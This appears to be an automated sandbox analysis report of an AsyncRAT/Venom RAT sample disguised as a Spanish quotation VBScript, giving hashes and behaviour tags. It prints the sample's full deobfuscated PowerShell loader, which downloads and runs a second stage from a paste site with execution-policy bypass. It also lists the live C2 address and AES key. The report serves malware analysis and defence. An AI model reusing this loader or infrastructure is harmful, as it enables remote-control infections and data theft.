asyncrat

General

Target

COTIZACIÓN.vbs
Size

8.5MB
Sample

250331-v2lslsxjt4
MD5

804513fa0ce051329e04056cdcd334bf
SHA1

107e788694216d64c5c02990f035f1d1acb60cf9
SHA256

17dd3793d4bbf9e90e53df26678489a7b82e65d1eeecf396eb088b444a164f85
SHA512

83aa0132a7fb8f2029c84fd329a2ff9179e646048e8a5997b1978dec2f29583c5f23808f6eb22be618744d21cd5d5f589f30d4e47d302484597ca960f2379f16
SSDEEP

192:DloyjjdVMFZNkNls2vv8hAwxJV837YTUf:lxO7k0hAwHVk

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

1

[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12

2

$zfkaa = "https://textbin.net/raw/ezjmofz3s6"

3

$iepgq = [system.io.path]::gettemppath() + "dll01.txt"

4

$webclient = new-object system.net.webclient

5

$rvuxv = $webclient.downloadstring("https://textbin.net/raw/ezjmofz3s6")

6

$rvuxv|out-file -filepath $iepgq -encoding "UTF8" -force

7

$stfgl = [system.io.path]::gettemppath() + "dll02.txt"

8

$phrln = new-object system.net.webclient

9

$phrln.encoding = [system.text.encoding]::ascii

10

$dhzua = get-content -path $iepgq

11

$utlhz = $phrln.downloadstring($dhzua)

12

$utlhz|out-file -filepath $stfgl -force

13

$modrg = "$ryaeG = (Get-Content -Path '" + $stfgl + "' -Encoding UTF8);"

14

$modrg = "[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('$$$$','A') ) ;"

15

$modrg = "[System.AppDomain]::CurrentDomain.Load( $Fyfdz )."

16

$modrg = "GetType( 'MisericordiosoAmen.Class1' ).GetM"

17

$modrg = "ethod( 'MsqBIbY' ).Invoke( $null , [object[]] ( '0/1BWtX3v5/r/ee.etsap//:sptth' , 'C:\\Users\\Admin\\AppData\\Local\\Temp\\COTIZACIÓN.vbs' , '____________________________________________-------', '0134', '1', 'Roda' ) ) ;"

18

$vbwwz = [system.io.path]::gettemppath() + "dll03.ps1"

19

$modrg|out-file -filepath $vbwwz -force

20

powershell -executionpolicy bypass -file $vbwwz

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

1
tyWE2hYW1GHz2HI9Pm5puDdBPIk7SWZ5

Targets

- Target
  
  COTIZACIÓN.vbs
- Size
  
  8.5MB
- MD5
  
  804513fa0ce051329e04056cdcd334bf
- SHA1
  
  107e788694216d64c5c02990f035f1d1acb60cf9
- SHA256
  
  17dd3793d4bbf9e90e53df26678489a7b82e65d1eeecf396eb088b444a164f85
- SHA512
  
  83aa0132a7fb8f2029c84fd329a2ff9179e646048e8a5997b1978dec2f29583c5f23808f6eb22be618744d21cd5d5f589f30d4e47d302484597ca960f2379f16
- SSDEEP
  
  192:DloyjjdVMFZNkNls2vv8hAwxJV837YTUf:lxO7k0hAwHVk
Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat
- AsyncRat
  AsyncRAT is designed to remotely monitor and control other computers written in C#.
  rat asyncrat
- Asyncrat family
  asyncrat
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Adds Run key to start application
  persistence
- Hide Artifacts: Hidden Window
  Windows that would typically be displayed when an application carries out an operation can be hidden.
  defense_evasion
- Suspicious use of SetThreadContext
behavioral1